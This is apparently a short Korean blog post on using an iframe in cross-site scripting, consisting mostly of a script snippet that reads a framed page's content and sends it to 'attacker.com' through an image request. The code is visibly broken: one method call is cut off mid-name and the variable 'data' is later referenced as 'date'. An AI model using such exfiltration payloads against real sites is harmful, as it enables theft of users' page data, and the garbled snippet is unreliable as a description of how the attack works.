XSS에서 iframe 태그

 

<iframe id='myFrame' src="https://test.com/mypage.php"></iframe>

<script>

    var myFrame = document.getElementById('myFrame');

    var data = myFrame.contentDocument.getElementBy

    var i = new Image();

   i.src = "https://attacker.com/?" +date;

</script>

 

답글 남기기

이메일 주소는 공개되지 않습니다. 필수 필드는 *로 표시됩니다